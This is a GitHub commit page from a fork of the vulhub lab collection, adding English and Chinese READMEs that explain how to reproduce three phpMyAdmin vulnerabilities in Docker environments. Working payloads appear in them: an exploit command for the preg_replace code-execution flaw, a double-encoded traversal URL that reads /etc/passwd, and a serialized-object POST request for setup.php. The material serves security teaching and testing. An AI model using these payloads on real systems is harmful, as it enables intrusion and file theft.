forked from vulhub/vulhub
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
6 changed files
with
133 additions
and
31 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,35 +1,37 @@ | ||
| # phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) | ||
| # PhpMyAdmin 4.0.x—4.6.2 Remote Code Execution Vulnerability (CVE-2016-5734) | ||
|
|
||
| phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进`preg_replace`函数第一个参数中。 | ||
| [中文版本(Chinese version)](README.zh-cn.md) | ||
|
|
||
| 在PHP5.4.7以前,`preg_replace`的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 | ||
| PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `preg_replace` function, because the information submitted by the user can be spliced into the first parameter. | ||
|
|
||
| 以下版本受到影响: | ||
| Before PHP 5.4.7, the first parameter of `preg_replace` could be truncated with `\0` and the change search pattern to `\e`. It can cause remote code execution vulnerability. | ||
|
|
||
| - 4.0.10.16之前4.0.x版本 | ||
| - 4.4.15.7之前4.4.x版本 | ||
| - 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,所以无法复现本漏洞) | ||
| Affected versions: | ||
|
|
||
| ## 环境搭建 | ||
| - 4.0.x version before 4.0.10.16 | ||
| - 4.4.x version before 4.4.15.7 | ||
| - 4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced) | ||
|
|
||
| 运行如下命令启动PHP 5.3 + Apache + phpMyAdmin 4.4.15.6: | ||
| ## Setup | ||
|
|
||
| Execute following commands to start PHP 5.3 + Apache + phpMyAdmin 4.4.15.6: | ||
|
|
||
| ``` | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| 启动后,访问`http://your-ip:8080`,即可看到phpMyAdmin的登录页面。使用`root`:`root`登录。 | ||
| After start, visit `http://your-ip:8080` and you will see the login page of phpMyAdmin. Log in with `root`:`root`. | ||
|
|
||
| ## 漏洞复现 | ||
| ## Expliot | ||
|
|
||
| 这个功能需要登录,且能够写入数据。 | ||
| This vulnerability requires login and the permission to write data. | ||
|
|
||
| 因为目标环境使用root,所以我们可以创建一个临时数据库和数据表,进行漏洞利用。这里,我们使用POC https://www.exploit-db.com/exploits/40185/ 来复现漏洞。 | ||
| We use this POC(https://www.exploit-db.com/exploits/40185/) to reproduce the vulnerability. | ||
|
|
||
| ``` | ||
| ./cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://your-ip:8080/ | ||
| ``` | ||
|
|
||
|  | ||
| Result: | ||
|
|
||
| -d是已经可以写的数据库,-c是待执行的PHP语句,如果没有指定表名,这个POC会创建一个名为`prgpwn`的表。 | ||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,35 @@ | ||
| # phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734) | ||
|
|
||
| phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进`preg_replace`函数第一个参数中。 | ||
|
|
||
| 在PHP5.4.7以前,`preg_replace`的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 | ||
|
|
||
| 以下版本受到影响: | ||
|
|
||
| - 4.0.10.16之前4.0.x版本 | ||
| - 4.4.15.7之前4.4.x版本 | ||
| - 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,所以无法复现本漏洞) | ||
|
|
||
| ## 环境搭建 | ||
|
|
||
| 运行如下命令启动PHP 5.3 + Apache + phpMyAdmin 4.4.15.6: | ||
|
|
||
| ``` | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| 启动后,访问`http://your-ip:8080`,即可看到phpMyAdmin的登录页面。使用`root`:`root`登录。 | ||
|
|
||
| ## 漏洞复现 | ||
|
|
||
| 这个功能需要登录,且能够写入数据。 | ||
|
|
||
| 因为目标环境使用root,所以我们可以创建一个临时数据库和数据表,进行漏洞利用。这里,我们使用POC https://www.exploit-db.com/exploits/40185/ 来复现漏洞。 | ||
|
|
||
| ``` | ||
| ./cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://your-ip:8080/ | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| -d是已经可以写的数据库,-c是待执行的PHP语句,如果没有指定表名,这个POC会创建一个名为`prgpwn`的表。 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,28 +1,30 @@ | ||
| # phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) | ||
| # phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613) | ||
|
|
||
| phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 | ||
| [中文版本(Chinese version)](README.zh-cn.md) | ||
|
|
||
| 参考文档: | ||
| PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `index.php`, causing files iclusion vulnerabilitiy. | ||
|
|
||
| Reference links: | ||
|
|
||
| - https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog | ||
| - https://www.phpmyadmin.net/security/PMASA-2018-4/ | ||
|
|
||
| ## 漏洞环境 | ||
| ## Setup | ||
|
|
||
| 执行如下命令,启动phpmyadmin 4.8.1: | ||
| Run the following command to start phpmyadmin 4.8.1: | ||
|
|
||
| ``` | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| 环境启动后,访问`http://your-ip:8080`,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 | ||
| After the environment starts, visit `http://your-ip:8080`. The phpmyadmin is "config" mode, so we can login directly. | ||
|
|
||
| ## 漏洞复现 | ||
| ## Expliot | ||
|
|
||
| 访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`,可见`/etc/passwd`被读取,说明文件包含漏洞存在: | ||
| Visit `http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`, the result indicates that the file inclusion vulnerability exist: | ||
|
|
||
|  | ||
|
|
||
| 利用方式也比较简单,可以执行一下`SELECT '<?=phpinfo()?>';`,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可: | ||
| We can execute `SELECT '<?=phpinfo()?>';`, then check your sessionid (the value of phpMyAdmin in the cookie), and then include the session file: | ||
|
|
||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,28 @@ | ||
| # phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) | ||
|
|
||
| phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 | ||
|
|
||
| 参考文档: | ||
|
|
||
| - https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog | ||
| - https://www.phpmyadmin.net/security/PMASA-2018-4/ | ||
|
|
||
| ## 漏洞环境 | ||
|
|
||
| 执行如下命令,启动phpmyadmin 4.8.1: | ||
|
|
||
| ``` | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| 环境启动后,访问`http://your-ip:8080`,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 | ||
|
|
||
| ## 漏洞复现 | ||
|
|
||
| 访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`,可见`/etc/passwd`被读取,说明文件包含漏洞存在: | ||
|
|
||
|  | ||
|
|
||
| 利用方式也比较简单,可以执行一下`SELECT '<?=phpinfo()?>';`,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可: | ||
|
|
||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| # phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) | ||
|
|
||
| phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 | ||
|
|
||
| ## 环境搭建 | ||
|
|
||
| 执行如下命令启动phpmyadmin: | ||
|
|
||
| ``` | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| 环境启动后,访问`http://your-ip:8080`,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 | ||
|
|
||
| ## 漏洞复现 | ||
|
|
||
| 发送如下数据包,即可读取`/etc/passwd`: | ||
|
|
||
| ``` | ||
| POST /scripts/setup.php HTTP/1.1 | ||
| Host: your-ip:8080 | ||
| Accept-Encoding: gzip, deflate | ||
| Accept: */* | ||
| Accept-Language: en | ||
| User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) | ||
| Connection: close | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Content-Length: 80 | ||
| action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} | ||
| ``` | ||
|
|
||
|  |